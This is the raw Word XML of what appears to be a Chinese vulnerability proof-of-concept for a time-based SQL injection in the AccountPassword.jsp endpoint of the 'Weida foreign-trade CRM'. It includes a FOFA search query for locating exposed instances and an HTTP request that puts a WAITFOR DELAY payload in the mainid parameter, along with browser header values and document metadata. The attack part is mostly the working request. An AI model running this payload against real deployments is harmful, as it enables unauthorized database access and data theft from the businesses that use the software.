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6F822">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>维达外贸客户关系管理系统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AccountPassword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SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55617E3D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294A1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FOFA：title="维达外贸客户关系管理系统"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F0CEBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC38CE7"/>
    <w:p w14:paraId="1331C237">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7E6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04DE71D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB869C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/wap/common/admin/AccountPassword.jsp?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mainid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1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--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3976229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3B50937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text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6039C8F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6EC2E42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en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AA7CC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0B1584B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Chrome/91.0.4472.124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0DA3CC3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5466F40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F76317"/>
    <w:rsid w:val="444316B7"/>
    <w:rsid w:val="48603CB2"/>
    <w:rsid w:val="4E3B7B85"/>
    <w:rsid w:val="624B51DE"/>
    <w:rsid w:val="6B283E1C"/>
    <w:rsid w:val="727D56F2"/>
    <w:rsid w:val="79AC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489</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>511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2025-04-21T02:24:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:16:31Z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21B2C1378A71451D9B261D26225E5F2A_12</vt:lpwstr>
  </property>
</Properties>
</file>